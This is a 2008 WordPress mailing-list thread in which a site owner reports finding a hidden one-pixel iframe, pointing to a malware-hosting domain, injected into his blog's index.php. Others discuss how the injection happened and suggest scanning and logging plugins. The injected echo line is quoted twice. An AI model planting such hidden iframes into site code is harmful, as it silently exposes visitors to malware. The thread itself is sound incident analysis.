[wp-hackers] Re: XSS vuln in wordpress 2.7 ?

madalin niladam at gmail.com
Mon Dec 22 22:40:16 GMT 2008 

Kim.

Thanks alot, i'll try them right away.


On Tue, Dec 23, 2008 at 12:32 AM, Kim Parsell <kparsell-wp at kpdesign.net> wrote:
> madalin -
> I'm going to suggest 2 plugins for you to look into using:
>
> WordPress Exploit Scanner (Donncha O Caoimh):
> http://wordpress.org/extend/plugins/exploit-scanner/
>
> postlogger for WordPress:
> http://www.village-idiot.org/archives/2008/04/16/postlogger-for-wordpress/
>
> I run postlogger, and it's very interesting the things that it logs that
> regular access logs don't. Not saying it would have caught this intruder,
> but you might find other interesting things going on that you're not aware
> of that you can block.
>
> The Exploit Scanner might let you know if there's a vulnerability in a
> plugin or anywhere else in your WordPress install.
>
> Kim
>
> -------------------------
>
> baker wrote:
>>
>> Just to chime in on the fun, you're not the only one as a quick google
>> search pulls a lot of people with similar posts.
>>
>> http://www.networksolutions.com/whois-search/thedeadpit.com
>>
>> As well shows the (supposed) owner is in Estonia, which oddly enough
>> I've seen a lot of failed hack attempts on my site coming from Estonia
>> (I think, maybe it was algeria?)
>>
>> Do you have mod_security enabled? No luck on pulling down the
>> offender's IP, and the site itself seems to do nothing but host a
>> virus...
>>
>> Best of luck turning this around...
>>
>> -kb
>>
>>>
>>> ------------------------------
>>>
>>> Message: 7
>>> Date: Mon, 22 Dec 2008 20:39:49 +0200
>>> From: madalin <niladam at gmail.com>
>>> Subject: Re: [wp-hackers] XSS vuln in wordpress 2.7 ?
>>> To: wp-hackers at lists.automattic.com
>>> Message-ID:
>>>       <df809b110812221039y29f116f1k5238dfb209d3f30a at mail.gmail.com>
>>> Content-Type: text/plain; charset=UTF-8
>>>
>>> Yes that's exactly what i am saying. Here is my index.php:
>>>
>>> <?php
>>> /**
>>>  * Front to the WordPress application. This file doesn't do anything, but
>>> loads
>>>  * wp-blog-header.php which does and tells WordPress to load the theme.
>>>  *
>>>  * @package WordPress
>>>  */
>>>
>>> /**
>>>  * Tells WordPress to load the WordPress theme and output it.
>>>  *
>>>  * @var bool
>>>  */
>>> define('WP_USE_THEMES', true);
>>>
>>> /** Loads the WordPress Environment and Template */
>>> require('./wp-blog-header.php');
>>>
>>> // echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
>>> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>> ?>
>>>
>>> I've commented the line so i can keep it for future investigations.
>>>
>>> Our password have NOT been compromised as the only logins are from my
>>> host and my friend's host. It could be an older version of a plugin
>>> tough.
>>>
>>> However, i had to report this as maybe someone will encounter the same
>>> problem or so.
>>>
>>> Thanks.
>>>
>>> On Mon, Dec 22, 2008 at 8:36 PM, Stephen Rider
>>> <wp-hackers at striderweb.com> wrote:
>>>
>>>>
>>>> Well, wait.  he said:  "i found [it in] my blog's index.php (not theme's
>>>> index.php)"
>>>>
>>>> Does this mean it shows up in the final rendered page, but not in the
>>>> theme's file?  In that case, it's being added dynamically.  The link is
>>>> not
>>>> written in the theme.
>>>>
>>>> Just trying to clarify.  I'm no security guru... (IANASG)
>>>>
>>>> Stephen
>>>>
>>>> On Dec 22, 2008, at 11:33 AM, Joost de Valk wrote:
>>>>
>>>>>
>>>>> If the file is writable for the webserver and file access is enabled on
>>>>> the webserver: yes.
>>>>>        On Dec 22, 2008, at 18:31, Dan Gayle <dangayle at gmail.com> wrote:
>>>>>
>>>>>>
>>>>>> Wow. That's nasty, and malicious. Could a plugin do that?
>>>>>>
>>>>>> On Dec 22, 2008, at 9:27 AM, madalin wrote:
>>>>>>
>>>>>>>
>>>>>>> For some reason i found my blog's index.php (not theme's index.php)
>>>>>>> with the following piece of code right before the ?>
>>>>>>>
>>>>>>> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
>>>>>>> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>>>>>>
>>>>>>> I tried looking at the logs. No luck. The file's permisions look like
>>>>>>> this:
>>>>>>>
>>>>>>> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50
>>>>>>> /home/madalin/www/index.php
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>

More information about the wp-hackers mailing list